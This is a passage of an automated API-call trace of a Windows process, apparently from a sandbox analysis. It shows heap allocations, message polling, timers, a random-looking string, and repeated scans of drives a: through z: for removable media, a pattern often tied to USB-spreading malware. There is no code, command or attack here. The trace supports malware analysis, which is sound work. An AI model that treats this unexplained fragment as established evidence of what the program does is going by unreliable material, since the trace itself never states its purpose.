returned 0 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.262] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.262] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.263] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0217.263] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.263] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0217.263] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.263] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.263] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.263] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.264] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.264] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.264] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.264] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.264] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.264] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.265] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.265] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.265] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.266] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.266] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.266] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.267] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.267] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.267] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.267] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.268] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.268] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.268] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.269] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.269] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.269] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.269] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.270] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.270] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.270] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0217.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.271] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.271] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.271] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0217.271] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.271] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.271] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.271] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.271] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.271] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.271] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.271] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0217.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0217.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0217.272] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0217.272] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.273] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.273] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0217.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.273] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0217.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0217.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.273] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0217.274] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0217.274] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.274] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.274] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.274] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.274] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.274] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.275] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.275] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.275] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.275] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.276] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.276] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.276] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.276] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.277] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.277] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.277] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.277] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.278] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.283] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.284] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.284] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.284] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.284] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.285] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.285] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.285] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.286] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.287] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.287] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.287] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.287] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.287] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.287] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.287] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0217.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0217.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0217.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0217.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.288] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0217.288] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0217.288] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.288] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.289] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.289] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.289] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.289] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0217.289] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.289] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.289] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.289] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0217.289] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.289] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0217.289] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.289] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0217.289] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.289] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.289] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0217.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.290] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.290] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0217.290] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.290] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.290] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.291] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.291] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.291] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.291] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.291] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.291] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.292] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.292] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.292] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.292] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.293] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.293] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.293] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.293] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.294] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.294] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.294] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.294] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.294] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.295] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.295] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.295] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.295] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.295] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0217.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.296] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.296] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.296] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0217.296] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.296] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.296] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0217.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 